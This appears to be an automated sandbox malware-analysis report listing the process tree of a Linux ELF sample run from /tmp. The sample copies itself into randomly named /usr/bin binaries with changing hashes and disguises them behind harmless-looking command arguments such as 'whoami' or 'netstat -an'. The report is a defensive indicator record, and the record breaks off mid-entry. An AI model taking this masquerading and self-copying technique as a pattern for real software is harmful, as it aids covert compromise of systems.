Path:	/usr/bin/vnihfmehfy
Arguments:	/usr/bin/vnihfmehfy sh 6261
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: vnihfmehfy PID: 6374, Parent PID: 6370

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6372, Parent PID: 6261

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6373, Parent PID: 6372

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vnihfmehfy PID: 6373, Parent PID: 6372

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	/usr/bin/vnihfmehfy uptime 6261
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: vnihfmehfy PID: 6377, Parent PID: 6373

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6375, Parent PID: 6261

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6376, Parent PID: 6375

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: vnihfmehfy PID: 6376, Parent PID: 6375

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	/usr/bin/vnihfmehfy top 6261
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: vnihfmehfy PID: 6378, Parent PID: 6376

General

Start time (UTC):	14:28:15
Start date (UTC):	03/01/2025
Path:	/usr/bin/vnihfmehfy
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0f21df0836e951d36bb440812753052

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6381, Parent PID: 6261

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6382, Parent PID: 6381

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: eqoogeqyds PID: 6382, Parent PID: 6381

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	/usr/bin/eqoogeqyds "netstat -an" 6261
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: eqoogeqyds PID: 6385, Parent PID: 6382

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	-
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6386, Parent PID: 6261

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6387, Parent PID: 6386

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: eqoogeqyds PID: 6387, Parent PID: 6386

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	/usr/bin/eqoogeqyds "echo \"find\"" 6261
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: eqoogeqyds PID: 6389, Parent PID: 6387

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	-
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6388, Parent PID: 6261

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6390, Parent PID: 6388

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: eqoogeqyds PID: 6390, Parent PID: 6388

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	/usr/bin/eqoogeqyds whoami 6261
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: eqoogeqyds PID: 6393, Parent PID: 6390

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	-
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6391, Parent PID: 6261

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6392, Parent PID: 6391

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: eqoogeqyds PID: 6392, Parent PID: 6391

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	/usr/bin/eqoogeqyds "sleep 1" 6261
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: eqoogeqyds PID: 6396, Parent PID: 6392

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	-
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6394, Parent PID: 6261

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6395, Parent PID: 6394

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: eqoogeqyds PID: 6395, Parent PID: 6394

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	/usr/bin/eqoogeqyds "route -n" 6261
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: eqoogeqyds PID: 6397, Parent PID: 6395

General

Start time (UTC):	14:28:21
Start date (UTC):	03/01/2025
Path:	/usr/bin/eqoogeqyds
Arguments:	-
File size:	548649 bytes
MD5 hash:	4bb785727d658c24555afb2552203824

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6400, Parent PID: 6261

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6401, Parent PID: 6400

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: otlzwyqefc PID: 6401, Parent PID: 6400

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	/usr/bin/otlzwyqefc whoami 6261
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: otlzwyqefc PID: 6402, Parent PID: 6401

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	-
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6403, Parent PID: 6261

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6404, Parent PID: 6403

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: otlzwyqefc PID: 6404, Parent PID: 6403

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	/usr/bin/otlzwyqefc ls 6261
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: otlzwyqefc PID: 6407, Parent PID: 6404

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	-
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6405, Parent PID: 6261

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6406, Parent PID: 6405

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: otlzwyqefc PID: 6406, Parent PID: 6405

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	/usr/bin/otlzwyqefc uptime 6261
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: otlzwyqefc PID: 6412, Parent PID: 6406

General

Start time (UTC):	14:28:27
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	-
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6408, Parent PID: 6261

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6409, Parent PID: 6408

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: otlzwyqefc PID: 6409, Parent PID: 6408

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	/usr/bin/otlzwyqefc "netstat -antop" 6261
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: otlzwyqefc PID: 6413, Parent PID: 6409

General

Start time (UTC):	14:28:27
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	-
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6410, Parent PID: 6261

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6411, Parent PID: 6410

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: otlzwyqefc PID: 6411, Parent PID: 6410

General

Start time (UTC):	14:28:26
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	/usr/bin/otlzwyqefc sh 6261
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: otlzwyqefc PID: 6414, Parent PID: 6411

General

Start time (UTC):	14:28:27
Start date (UTC):	03/01/2025
Path:	/usr/bin/otlzwyqefc
Arguments:	-
File size:	548649 bytes
MD5 hash:	3cab282fbf544a8c5da93e8a6e8649d0

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6417, Parent PID: 6261

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6418, Parent PID: 6417

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6418, Parent PID: 6417

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	/usr/bin/dthtwwmqvu ls 6261
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6419, Parent PID: 6418

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6420, Parent PID: 6261

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6421, Parent PID: 6420

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6421, Parent PID: 6420

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	/usr/bin/dthtwwmqvu whoami 6261
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6424, Parent PID: 6421

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6422, Parent PID: 6261

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6423, Parent PID: 6422

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6423, Parent PID: 6422

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	/usr/bin/dthtwwmqvu ifconfig 6261
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6427, Parent PID: 6423

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6425, Parent PID: 6261

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6426, Parent PID: 6425

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6426, Parent PID: 6425

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	/usr/bin/dthtwwmqvu "netstat -an" 6261
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6430, Parent PID: 6426

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6428, Parent PID: 6261

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6429, Parent PID: 6428

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6429, Parent PID: 6428

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	/usr/bin/dthtwwmqvu "netstat -an" 6261
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: dthtwwmqvu PID: 6431, Parent PID: 6429

General

Start time (UTC):	14:28:32
Start date (UTC):	03/01/2025
Path:	/usr/bin/dthtwwmqvu
Arguments:	-
File size:	548649 bytes
MD5 hash:	f0744c231fd483b8e536adaae22fed9c

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6435, Parent PID: 6261

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6436, Parent PID: 6435

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6436, Parent PID: 6435

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	/usr/bin/jeyjdycnpv "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6437, Parent PID: 6436

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	-
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6438, Parent PID: 6261

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6439, Parent PID: 6438

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6439, Parent PID: 6438

General

Start time (UTC):	14:28:37
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	/usr/bin/jeyjdycnpv "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6442, Parent PID: 6439

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	-
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6440, Parent PID: 6261

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6441, Parent PID: 6440

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6441, Parent PID: 6440

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	/usr/bin/jeyjdycnpv ifconfig 6261
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6445, Parent PID: 6441

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	-
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6443, Parent PID: 6261

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6444, Parent PID: 6443

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6444, Parent PID: 6443

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	/usr/bin/jeyjdycnpv "ps -ef" 6261
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6448, Parent PID: 6444

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	-
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6446, Parent PID: 6261

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6447, Parent PID: 6446

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6447, Parent PID: 6446

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	/usr/bin/jeyjdycnpv ls 6261
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: jeyjdycnpv PID: 6449, Parent PID: 6447

General

Start time (UTC):	14:28:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/jeyjdycnpv
Arguments:	-
File size:	548649 bytes
MD5 hash:	874925f3383cf4d89cfb331d6357dcc4

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6452, Parent PID: 6261

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6453, Parent PID: 6452

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: wutujskjnm PID: 6453, Parent PID: 6452

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	/usr/bin/wutujskjnm "grep \"A\"" 6261
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: wutujskjnm PID: 6454, Parent PID: 6453

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	-
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6455, Parent PID: 6261

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6456, Parent PID: 6455

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: wutujskjnm PID: 6456, Parent PID: 6455

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	/usr/bin/wutujskjnm "echo \"find\"" 6261
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: wutujskjnm PID: 6459, Parent PID: 6456

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/usr/bin/wutujskjnm
Arguments:	-
File size:	548649 bytes
MD5 hash:	890231c9558b66f036f3c8f7cebb5d72

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6457, Parent PID: 6261

General

Start time (UTC):	14:28:43
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
